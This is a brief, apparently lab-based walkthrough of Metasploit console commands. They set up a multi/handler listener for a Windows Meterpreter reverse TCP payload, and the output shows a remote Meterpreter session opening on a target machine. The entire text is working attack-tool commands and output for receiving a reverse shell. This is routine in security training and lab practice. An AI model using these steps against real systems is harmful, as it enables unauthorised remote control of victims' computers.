Steps to create a Metasploit listener:
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 10.10.14.13
lhost => 10.10.14.13
msf5 exploit(multi/handler) > set lport 9999
lport => 9999
msf5 exploit(multi/handler) > set ExitOnSession false
ExitOnSession => false
msf5 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.msf5 exploit(multi/handler)
[*] Started reverse TCP handler on 10.10.14.13:9999
[*] Sending stage (176195 bytes) to 10.10.10.5
[*] Meterpreter session 1 opened (10.10.14.13:9999 -> 10.10.10.5:49157) at 2020-06-24 16:25:48 +0200
sessions -i 1
[*] Starting interaction with 1...
meterpreter >